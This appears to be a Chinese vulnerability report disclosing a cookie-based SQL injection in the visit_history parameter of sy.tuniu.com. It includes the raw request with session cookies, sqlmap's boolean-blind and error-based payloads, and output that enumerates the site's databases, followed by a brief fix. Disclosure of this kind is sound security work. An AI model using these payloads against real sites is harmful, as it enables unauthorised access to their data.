访问首页链接查看提交消息，发现链接参数随cookie提交。对参数进行fuzz发现存在cookie注入漏洞，此问题比较严重，希望给与重视。
详细说明：
GET /zhoubian/leyuan/ HTTP/1.1
Host: sy.tuniu.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://sy.tuniu.com/tours/311094
Cookie: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; visit_history=311094; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3
DNT: 1
Cache-Control: max-age=0

测试发现参数visit_history=311094存在cookie注入漏洞
 
 

sqlmap identified the following injection points with a total of 210 HTTP(s) requests:
---
Place: Cookie
Parameter: visit_history
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; visit_history=311094) AND 4608=4608 AND (9847=9847; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; visit_history=311094) AND (SELECT 3540 FROM(SELECT COUNT(*),CONCAT(0x3a79756b3a,(SELECT (CASE WHEN (3540=3540) THEN 1 ELSE 0 END)),0x3a6878653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5085=5085; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3
---

[11:03:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
[11:03:27] [INFO] fetching database names
[11:03:27] [WARNING] the SQL query provided does not return any output
[11:03:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[11:03:27] [INFO] fetching number of databases
[11:03:27] [INFO] retrieved: 3
[11:03:31] [INFO] retrieving the length of query output
[11:03:31] [INFO] retrieved: 18
[11:03:50] [INFO] retrieved: information_schema
[11:03:50] [INFO] retrieving the length of query output
[11:03:50] [INFO] retrieved: 4
[11:03:59] [INFO] retrieved: test
[11:03:59] [INFO] retrieving the length of query output
[11:03:59] [INFO] retrieved: 5
[11:04:09] [INFO] retrieved: tuniu
available databases [3]:
[*] information_schema
[*] test
[*] tuniu

[11:04:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 202 times
[11:04:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/sy.tuniu.com'
-------------------------------------------------------------
使用sqlmap获取数据库信息
available databases [3]:
[*] information_schema
[*] test
[*] tuniu

没继续深做了，问题比较多，有时间再往乌云上放吧~~
修复方案：
参数过滤